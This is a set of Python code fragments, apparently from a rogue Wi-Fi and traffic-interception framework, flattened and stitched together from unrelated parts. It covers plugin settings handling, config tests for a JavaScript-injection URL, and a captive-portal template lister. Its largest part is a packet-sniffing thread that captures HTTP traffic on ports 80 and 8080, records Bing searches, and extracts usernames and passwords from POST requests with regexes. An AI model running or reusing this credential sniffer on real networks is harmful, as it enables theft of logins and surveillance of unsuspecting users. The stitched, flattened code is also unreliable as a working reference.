class CoreSettings(Linux): Name = "General" ID = "General" ConfigRoot = "General" Category = "General" Icon = None __subitem = False conf = {} def __init__(self, parent=0, FSettings=None): super(CoreSettings, self).__init__() self.parent = parent self.conf = SettingsINI(C.CONFIG_INI) def deleteObject(self, obj): """ reclaim memory """ del obj @property def getIptablesPath(self): return self.conf.get("iptables", "path_binary") @property def isSubitem(self): return self.__subitem def osWalkCallback(self, arg, directory, files): pass
class TestConfigPumpkinProxy(unittest.TestCase): def test_config_key_set(self): self.config = SettingsINI(C.CONFIG_PP_INI) self.result = "http://example.com/foo.js" self.value = self.config.get("set_js_inject", "url") self.assertEqual(self.result, self.value) def test_get_all_configkey_list(self): self.config = SettingsINI(C.CONFIG_PP_INI) self.result = ["url"] self.value = self.config.get_all_childname("set_js_inject") self.assertEqual(self.result, self.value)
def do_list(self, args): """ show all avaliable templates from github """ if not path.isfile(self.save_path): print( display_messages( "can't find downloaded file: {}".format(self.save_path), error=True ) ) return config = SettingsINI(self.config_file_ini) plugins_installed = self.config_default.get_all_childname("plugins") self.plugins_remote = {} for plugin in config.get_all_childname("plugins"): self.plugins_remote[plugin] = {} for info in config.get_all_childname("info_{}".format(plugin)): self.plugins_remote[plugin][info] = config.get( "info_{}".format(plugin), info ) self.plugins_remote[plugin]["installed"] = ( setcolor("True", color="green") if plugin in plugins_installed else setcolor("False", color="red") ) self.table_output = [] for plugin in self.plugins_remote: self.table_output.append( [ self.plugins_remote[plugin]["name"], self.plugins_remote[plugin]["author"], self.plugins_remote[plugin]["installed"], self.plugins_remote[plugin]["preview"], ] ) if len(self.table_output) > 0: print( display_messages( "Available Customs CaptiveFlask:", info=True, sublime=True ) ) display_tabulate(self.table_headers, self.table_output)
def test_read_config_SettingsINI(self): config_file_ini = (tempfile.gettempdir() + "/extra-captiveflask-master/config.ini") config = SettingsINI(config_file_ini) result = { "example": { "author": "mh4x0f", "description": "Example is a simple portal default page", "preview": "https://i.imgur.com/G0wtAme.png", "name": "example", "version": "1.0", } } plugins = {} for plugin in config.get_all_childname("plugins"): plugins[plugin] = {} for info in config.get_all_childname("info_{}".format(plugin)): plugins[plugin][info] = config.get("info_{}".format(plugin), info) for plugin in plugins: print(plugin) self.assertEqual(result["example"], plugins["example"])
class SettingsPluginsResource(Resource): config = None key_name = "plugins" def create_config(self, plugin_id): plugin_settings_ini = C.ALL_CONFIGSINI.get(plugin_id) if plugin_settings_ini is None: return self.config = SettingsINI(plugin_settings_ini) @token_required def get(self, plugin_id=None): self.create_config(plugin_id) if self.config is None: return exception( "Cannot found plugin {} ini file.".format(plugin_id), code=400) data = {} for key in self.config.get_all_childname(self.key_name): data[key] = self.config.get(self.key_name, key) for sub_key in self.config.get_all_childname("set_{}".format(key)): if "set_{}".format(key) in list(data.keys()): data["set_{}".format(key)].append({ sub_key: self.config.get("set_{}".format(key), sub_key) }) else: data["set_{}".format(key)] = [] data["set_{}".format(key)].append({ sub_key: self.config.get("set_{}".format(key), sub_key) }) return jsonify(data) @token_required def post(self, plugin_id=None): data = request.get_json(force=True) self.create_config(plugin_id) if self.config is None: return exception( "Cannot found plugin {} ini file.".format(plugin_id), code=400) for key, value in data.items(): if str(key).startswith("set_"): for item in value: for sub_key, sub_value in item.items(): if not sub_key in self.config.get_all_childname(key): return exception( "Cannot found that attribute {} on {}!".format( sub_key, key), code=400, ) self.config.set(key, sub_key, sub_value) else: if not key in self.config.get_all_childname(self.key_name): return exception( "Cannot found that attribute {} on {}!".format( key, self.key_name), code=400, ) self.config.set(self.key_name, key, value) return jsonify(data)
class Sniffkin3Core(QtCore.QThread): _ProcssOutput = QtCore.pyqtSignal(object) def __init__(self, interface, session): QtCore.QThread.__init__(self) self.interface = interface self.session = session self.stopped = False self.config = SettingsINI(C.CONFIG_SK_INI) def run(self): self.main() def sniffer(self, q): while not self.stopped: try: sniff( iface=self.interface, filter="tcp and ( port 80 or port 8080)", prn=lambda x: q.put(x), store=0, ) except Exception: pass if self.stopped: break def main(self): self.plugins = {} self.plugin_classes = default.PSniffer.__subclasses__() for p in self.plugin_classes: plugin_load = p() self.plugins[plugin_load.Name] = plugin_load self.plugins[plugin_load.Name].output = self._ProcssOutput self.plugins[plugin_load.Name].session = self.session print("\n[*] {} running on port 80/8080:\n".format(self.getID())) for name in self.plugins.keys(): if self.config.get("plugins", name, format=bool): self.plugins[name].getInstance()._activated = True print("TCPProxy::{0:17} status:On".format(name)) print("\n") q = queue.Queue() sniff = Thread(target=self.sniffer, args=(q, )) sniff.start() while not self.stopped: try: pkt = q.get(timeout=0) for Active in self.plugins.keys(): if self.plugins[Active].getInstance()._activated: try: self.plugins[Active].filterPackets(pkt) except Exception: pass except queue.Empty: pass def snifferParser(self, pkt): try: if (pkt.haslayer(Ether) and pkt.haslayer(Raw) and not pkt.haslayer(IP) and not pkt.haslayer(IPv6)): return self.dport = pkt[TCP].dport self.sport = pkt[TCP].sport if pkt.haslayer(TCP) and pkt.haslayer(Raw) and pkt.haslayer(IP): self.src_ip_port = str(pkt[IP].src) + ":" + str(self.sport) self.dst_ip_port = str(pkt[IP].dst) + ":" + str(self.dport) if pkt.haslayer(Raw): self.load = pkt[Raw].load if self.load.startswith("GET"): self.get_http_GET(self.src_ip_port, self.dst_ip_port, self.load) self.searchBingGET( self.load.split("\n", 1)[0].split("&")[0]) elif self.load.startswith("POST"): header, url = self.get_http_POST(self.load) self.getCredentials_POST( pkt.getlayer(Raw).load, url, header, self.dport, self.sport) except: pass def searchBingGET(self, search): if "search?q" in search: searched = search.split("search?q=", 1)[1] searched = searched.replace("+", " ") print("Search::BING { %s }" % (searched)) def getCredentials_POST(self, payload, url, header, dport, sport): user_regex = ("([Ee]mail|%5B[Ee]mail%5D|[Uu]ser|[Uu]sername|" "[Nn]ame|[Ll]ogin|[Ll]og|[Ll]ogin[Ii][Dd])=([^&|;]*)") pw_regex = ("([Pp]assword|[Pp]ass|[Pp]asswd|[Pp]wd|[Pp][Ss][Ww]|" "[Pp]asswrd|[Pp]assw|%5B[Pp]assword%5D)=([^&|;]*)") username = re.findall(user_regex, payload) password = re.findall(pw_regex, payload) if not username == [] and not password == []: self._ProcssOutput.emit({ "POSTCreds": { "User": username[0][1], "Pass": password[0][1], "Url": url, "destination": "{}/{}".format(sport, dport), } }) def get_http_POST(self, load): dict_head = {} try: headers, body = load.split("\r\n\r\n", 1) header_lines = headers.split("\r\n") for item in header_lines: try: dict_head[item.split()[0]] = item.split()[1] except Exception: pass if "Referer:" in dict_head.keys(): return dict_head, dict_head["Referer:"] except ValueError: return None, None return dict_head, None def getpid(self): """ return the pid of current process in background""" return "thread" def getID(self): """ return the name of process in background""" return self.objectName() def stop(self): self.stopped = True print("Thread::[{}] successfully stopped.".format(self.objectName()))